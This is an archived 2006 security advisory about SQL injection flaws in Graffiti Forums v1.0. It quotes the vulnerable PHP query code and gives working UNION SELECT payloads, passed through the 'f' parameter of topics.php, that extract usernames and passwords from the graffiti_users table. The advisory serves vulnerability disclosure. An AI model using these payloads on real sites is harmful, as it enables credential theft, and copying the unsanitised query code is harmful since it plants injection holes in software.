TUCoPS :: Web BBS :: etc :: b06-3497.htm

Graffiti Forums v1.0 SQL Injection Vulnerabilities
Graffiti Forums v1.0 SQL Injection Vulnerabilities
Graffiti Forums v1.0 SQL Injection Vulnerabilities



/*=0D
--------------------------------------------------------=0D
[N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06=0D
--------------------------------------------------------=0D
Program: Graffiti Forums=0D
Homepage: http://www.bluedojo.com/=0D 
Vulnerable Versions: 1.0.=0D
Risk: High!=0D
Impact: Critical Risk=0D
=0D
-==Graffiti Forums v1.0 SQL Injection Vulnerabilities==-=0D
---------------------------------------------------------=0D
=0D
- Description=0D
---------------------------------------------------------=0D
 This forum uses PHP, MySQL, and Java and is very easy to install. It lets people draw pictures to a graffiti "wall" instead =0D
of posting text messages as in traditional forums.=0D
=0D
- Tested=0D
---------------------------------------------------------=0D
localhost=0D
=0D
- Explotation=0D
-------------------------------------------------=BA--------=0D
=0D
1)=0D
=0D
Vulnerable code:=0D
=0D
==[ topics.php 8-11 ]===========================0D
[...]=0D
$sql = "SELECT forum FROM graffiti_forums WHERE id=$f";=0D
$result = mysql_query($sql);=0D
$sql_row = mysql_fetch_row($result);=0D
$forum_title = $sql_row[0];=0D
[...]=0D
==[ end topics.php ]===========================0D
=0D
How we can see there's no protection for the using of simple quotes in the sql query. Also we have to say that the script =0D
doesn't work with register_globals off.=0D
=0D
In this way, we can put in the $f variable something like that =0D
2 UNION SELECT password as forum FROM graffiti_users=0D
=0D
So the sql query looks like this:=0D
=0D
SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users=0D
=B4=0D
Here, 2 is a valid forum id. Using some ORDER BY clauses you can get differents things... check it out.=0D
=0D
=0D
2) =0D
==[ topics.php 21-32 ]===========================0D
[...]=0D
if (!$option){=0D
	$sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f;=0D
	if ($result = mysql_query($sql)){=0D
		echo("
");=0D while ($sql_row = mysql_fetch_row($result)){=0D echo("");=0D echo("
");=0D $id = $sql_row[0];=0D $topic = $sql_row[1];=0D echo("");=0D echo("  $topic");=0D echo("");=0D [...]=0D ==[ end topics.php ]===========================0D =0D In the SQL query of this code we can see the same bug. The explotation is very similar that the other:=0D =0D topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users=0D =0D The final sql query looks like this:=0D =0D SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as topic, username as id FROM graffiti_users=0D =0D Here, 2 is a valid forum id. Another time you can play with some ORDER BY or GROUP BY clauses.=0D =0D =0D Practically all the sql querys of this script are vulnerable to SQL Injections, so i'm not going to keep searching bugs on a =0D bugs cave.=0D =0D Attention: the magic_quotes_gpc php flag has to be off (no filtering for slashes, simple quotes and double quotes). Also =0D remember that the script doesn't work without register_globals Off.=0D =0D =0D - How to fix it? More information?=0D --------------------------------------------------------=0D Visit our forum to know how to fix it or to get more information.=0D http://www.neosecurityteam.net/foro/=0D =0D - References=0D --------------------------------------------------------=0D http://www.neosecurityteam.net/index.php?action=advisories&id=24=0D =0D - Credits=0D --------------------------------------------------------=0D Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com=0D =0D [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/=0D =0D =0D - Greets=0D --------------------------------------------------------=0D HaCkZaTaN=0D K4P0=0D Daemon21=0D Link=0D 0m3gA_x=0D LINUX=0D m0rpheus=0D =0D Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!=0D =0D @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@=0D '@@@@@''@@'@@@''''''''@@''@@@''@@=0D '@@'@@@@@@''@@@@@@ @@@'''''@@@=0D '@@'''@@@@'''''''''@@@''''@@@=0D @@@@''''@@'@@@@@@@@@@''''@@@@@=0D =0D /* EOF */=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH